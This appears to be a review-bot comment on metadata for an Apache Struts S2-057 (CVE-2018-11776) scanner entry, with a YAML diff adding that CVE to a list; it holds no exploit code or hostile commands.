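Review bot: `scope-of-influence` lists only `Struts 2.3.1 - Struts 2.3.34`, while the `description` two lines above states that both 2.3 through 2.3.34 and 2.5 through 2.5.16 are affected, so anyone filtering on the scope field would miss the 2.5.x range; align it with the description, e.g. `scope-of-influence: Struts 2.3 - 2.3.34, Struts 2.5 - 2.5.16` (confirm the lower bounds against the NVD entry the `reference` list already cites). `info.name` holds a sentence describing what Apache Struts is rather than naming the vulnerability; the script's own banner calls it `Apache Struts2 S2-057`, which would serve better as the name, with the product sentence kept in `description`. The file is also committed without a trailing newline (`\ No newline at end of file`).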
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -31,6 +31,8 @@ cve:
 - CVE-2022-22947
 apache-commons-text:
 - CVE-2022-42889
+ apache-Struts:
+ - CVE-2018-11776
 unzip:
 - CVE-2022-0529
 django:
-- 
Gitee